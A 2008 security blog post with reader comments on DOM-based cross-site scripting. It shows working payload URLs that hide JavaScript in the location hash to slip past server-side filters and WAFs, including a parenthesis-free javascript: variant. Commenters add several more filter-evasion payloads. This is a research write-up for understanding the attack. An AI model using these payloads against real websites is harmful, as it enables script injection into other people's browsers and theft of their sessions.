Skip to content

Location based XSS attacks

The basic attack

Using the hash portion of the location is a good way to beat filters, anything sent via the hash is not sent to the server in question. We can use a large amount of data which is hidden from the server side filters and combine it with data sent on the server. For example we can send:-

http://someserver.com/somepage.php?
param=",eval(location.hash.slice(1))//#alert(1)

Data sent to the server : 

",eval(location.hash.slice(1))//

Data only sent through the client : 

#alert(1)

“slice” simply selects the location.hash from the second character because the # is included and would raise a syntax error.

More advanced variation

There are times when server side filters will remove all instances of “(” or “)” or maybe a WAF will disallow such requests. That alone will not save you from these sort of attacks because there’s a trick you can use to defeat those filters.

Remember the server can only see the server side potion of the attack, we can combine both strings to produce our attack without “(” or “)”. For example:-

http://someserver.com/somepage.php?
param=",location='javascript:/*'+location.hash//#*/alert(1)

Data sent to the server : 

",location='javascript:/*'+location.hash//

Data sent to the client : 

#*/alert(1)

We start the comment in the server side request and complete it in the client side location.hash request. Location is assigned javascript:/*#*/alert(1) removing the need for the slice(1) as shown previously.

The attacks mentioned are DOM based XSS attacks and are actually more common than you think, they are just more difficult to find than regular XSS.

Comments 7

  1. David Lindsay wrote:

    I really like the variation that avoids parenthesis. It’s cleaner than the setter trick and works cross browsers too. I’ll have to update my list of 2-stage injections to include it.

    Posted 01 Dec 2008 at 6:08 pm
  2. Giorgio Maone wrote:

    http://someserver.com/somepage.php?param=“,location=location#%0aalert(1)

    Posted 01 Dec 2008 at 9:50 pm
  3. Giorgio Maone wrote:

    Ooops (damn SpamBam)

    http://someserver.com/somepage.php?param=“,location=’javascript:’+location#%0aalert(1)

    Posted 01 Dec 2008 at 9:51 pm
  4. Giorgio Maone wrote:

    BTW, why not the ever green

    http://someserver.com/somepage.php?param=“,location=name

    ?

    Posted 01 Dec 2008 at 9:54 pm
  5. Gareth Heyes wrote:

    Yeah nice ones there’s other ways too but I thought I’d post the comment trick cause it’s nice :)

    location=’javascript:alert%25281%2529′

    Posted 01 Dec 2008 at 10:46 pm
  6. Ivan wrote:

    Can anyone explain, in which way this in an xss-attack?

    Posted 28 Dec 2008 at 7:28 am
  7. Gareth Heyes wrote:

    @ivan

    Look up dom based XSS and that should answer your question.

    Posted 28 Dec 2008 at 12:30 pm

Post a Comment

Your email is never published nor shared. Required fields are marked *

Comment spam protected by SpamBam